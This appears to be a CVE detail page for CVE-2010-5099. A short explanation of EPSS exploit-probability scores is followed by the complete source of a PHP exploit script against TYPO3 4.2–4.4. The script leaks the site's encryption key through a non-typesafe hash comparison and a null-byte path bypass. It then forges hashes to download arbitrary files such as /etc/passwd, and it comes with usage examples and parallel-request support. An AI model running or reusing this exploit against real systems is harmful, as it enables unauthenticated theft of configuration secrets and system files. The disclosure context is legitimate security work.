CVE-2010-5099 : Detail

The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.

The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.

<?php /* TYPO3-SA-2010-022.php * Exploit Title: TYPO3 Unauthenticated Arbitrary File Retrieval (TYPO3-SA-2010-020, TYPO3-SA-2010-022) * Date: 29/12/2010 * Author: ikki * Software Link: http://typo3.org/download/, http://sourceforge.net/projects/typo3/files/ * Version: 4.2.15, 4.3.7 or 4.4.4 * Tested on: php * CVE : CVE-2010-3714 (non-typesafe comparison flaw), n/a (fileDenyPattern bypass) * A demonstration video for this vulnerability is also available here: http://www.ikkisoft.com/stuff/TYPO3-SA-2010-020_video.htm * * @_ikki * * TYPO3 Unauthenticated Arbitrary File Retrieval (TYPO3-SA-2010-020, plus TYPO3-SA-2010-022) * * Exploiting a non-typesafe comparison flaw, a remote aggressor can access arbitrary files * on a vulnerable system. Authentication is not required to exploit this vulnerability. * Moreover, a "fileDenyPattern" bypass has been implemented in order to speed up the attack. * * References: * - http://typo3.org/teams/security/security-bulletins/typo3-sa-2010-020/ * - http://bugs.typo3.org/view.php?id=15898 * - http://php.net/manual/en/language.operators.comparison.php * - http://blog.nibblesec.org/2010/12/unspecified-vulnerabilities.html ("least disclosure" rant) * * Fix: Update to the TYPO3 versions 4.2.16, 4.3.9, 4.4.5 or newer * Credits: Gregor Kopf for finding the neat non-typesafe comparison flaw, Michał Trojnara for his daily tips */ define("VERSION","0.2"); /* v0.2 * - HTTP and HTTPS support (without verifying the peer's certificate) * - File retrieval, just after the initial encryption key disclosure * - Proxy support * - (Dirty) multi requests support (using curl multi_requests) * - Preliminary checks */ define("DEBUG",FALSE); if(!defined("STDIN")) define("STDIN", fopen('php://stdin','r')); if(!defined("STDERR")) define("STDERR", fopen('php://stderr','r')); /* Turn on/off all error reporting */ DEBUG ? error_reporting(E_ALL) : error_reporting(0); set_time_limit(0); /* Main */ echo("\n\n :: [ TYPO3-SA-2010-022.php v".VERSION." ] :: \n\n"); if($argc=="3"){ $typo=$argv[1]; $reqs=$argv[2]; //Uwaga! Too many requests may even slow down the attack }else if($argc=="4"){ $typo=$argv[1]; $reqs=$argv[2]; //Uwaga! Too many requests may even slow down the attack $proxy=$argv[3]; }else{ echo "Usage: php ".$argv[0]." TYPO3ValidURL ParallelRequests (Proxy)\n\n"; echo "Examples:\r\n"; echo "php ".$argv[0]." http://127.0.0.1/index.php?id=2 9\n"; echo "php ".$argv[0]." https://127.0.0.1/index.php?id=15 9\n"; echo "php ".$argv[0]." http://127.0.0.1:8080/index.php?id=223 12\n"; echo "php ".$argv[0]." http://127.0.0.1/index.php?id=223 12 http://127.0.0.1:8181\n\n"; exit; } $url=substr($typo,0,strpos($typo,"id=")-1); $id=substr($typo,strpos($typo,"id=")+3); $locationData=$id.":"; $jumpurl="typo3conf/ext/../localconf.php%00"; //Null byte and directory move up trick the fileDenyPattern mechanism $juHash="0"; // "0" is a numeric string, converted internally to 0 (int) by PHP during comparisons /* STEP 1 - Check the remote TYPO3 installation */ $ch=curl_init(); curl_setopt($ch, CURLOPT_URL, $url); curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, FALSE); curl_setopt($ch, CURLOPT_RETURNTRANSFER, TRUE); DEBUG ? curl_setopt($ch, CURLOPT_VERBOSE, TRUE):curl_setopt($ch, CURLOPT_VERBOSE, FALSE); curl_setopt($ch, CURLOPT_POST, 1); if(isset($proxy)){ curl_setopt($ch, CURLOPT_PROXY, $proxy); } curl_setopt($ch, CURLOPT_POSTFIELDS,"id=".$id."&type=0&jumpurl=".$jumpurl."&juSecure=1&locationData=".$locationData."&juHash=".$juHash); $output=curl_exec($ch); if(stristr($output,"did not match")) { echo("[*] TYPO3 successfully detected!\n"); }else{ echo("[!] A problem occurred while detecting the remote TYPO3 installation\n"); exit; } curl_close ($ch); /* STEP 2 - Retrieve $TYPO3_CONF_VARS['SYS']['encryptionKey'] from /typo3conf/localconf.php */ $mh = curl_multi_init(); $handles = array(); $location = $locationData; //locationData with padding for($i=0;$i<$reqs;$i++){ $ch = curl_init(); //create a new single curl handle curl_setopt($ch, CURLOPT_URL, $url); curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, FALSE); curl_setopt($ch, CURLOPT_RETURNTRANSFER, TRUE); curl_setopt($ch, CURLOPT_POST, 1); if(isset($proxy)){ curl_setopt($ch, CURLOPT_PROXY, $proxy); } $location = "%20".$location; curl_setopt($ch, CURLOPT_POSTFIELDS,"id=".$id."&type=0&jumpurl=".$jumpurl."&juSecure=1&locationData=".$location."&juHash=".$juHash); curl_multi_add_handle($mh,$ch); $handles[] = $ch; // put the handles in an array to loop } echo("[*] Starting TYPO3's encryption key retrieval\n"); echo("[*] Padding locationData to force '0exxxxxx' strings. It may take a while."); $rcont=0; while(!stristr($output,"TYPO3_CONF_VARS['SYS']['encryptionKey']")){ $running=null; do{ curl_multi_exec($mh,$running); } while ($running > 0); for($i=0;$i<count($handles);$i++){ $output = curl_multi_getcontent($handles[$i]); $location="%20".$location; curl_multi_remove_handle($mh,$handles[$i]); curl_setopt($handles[$i], CURLOPT_POSTFIELDS,"id=".$id."&type=0&jumpurl=".$jumpurl."&juSecure=1&locationData=".$location."&juHash=".$juHash); curl_multi_add_handle($mh,$handles[$i]); $rcont++; echo("."); } } curl_multi_remove_handle($mh,$handles[$i]); curl_multi_close($mh); $key=substr($output,strpos($output,"TYPO3_CONF_VARS['SYS']['encryptionKey'] = '")+43); $key=substr($key,0,strpos($key,"';")); echo("\n[*] Done! ".$rcont." requests\n"); echo("\n[*] TYPO3's encryption key:".$key."\n"); /* STEP 3 - Retrieve arbitrary files */ while(!0) { echo("\n[*] Which file do you want to download?\n"); echo("[*] Please make your selection (e.g. '/etc/passwd'):\n\n"); $jumpurl=trim(fgets(STDIN,256)); /* Generate a valid hash as in the TYPO3 codebase*/ $hArr= array($jumpurl,$locationData,$key); $juHash=substr(md5(serialize($hArr)),0,10);; $ch=curl_init(); curl_setopt($ch, CURLOPT_URL, $url); curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, FALSE); curl_setopt($ch, CURLOPT_RETURNTRANSFER, TRUE); DEBUG ? curl_setopt($ch, CURLOPT_VERBOSE, TRUE):curl_setopt($ch, CURLOPT_VERBOSE, FALSE); curl_setopt($ch, CURLOPT_POST, 1); if(isset($proxy)){ curl_setopt($ch, CURLOPT_PROXY, $proxy); } curl_setopt($ch, CURLOPT_POSTFIELDS,"id=".$id."&type=0&jumpurl=".$jumpurl."&juSecure=1&locationData=".$locationData."&juHash=".$juHash); $output=curl_exec($ch); echo("\n[*]------------------------------------------------------------------------------\n\n"); if(!stristr($output,"not a valid")) echo $output; else echo("[!] An error occurred while retriving '".$jumpurl."'\n"); echo("\n\n[*]------------------------------------------------------------------------------\n"); curl_close ($ch); }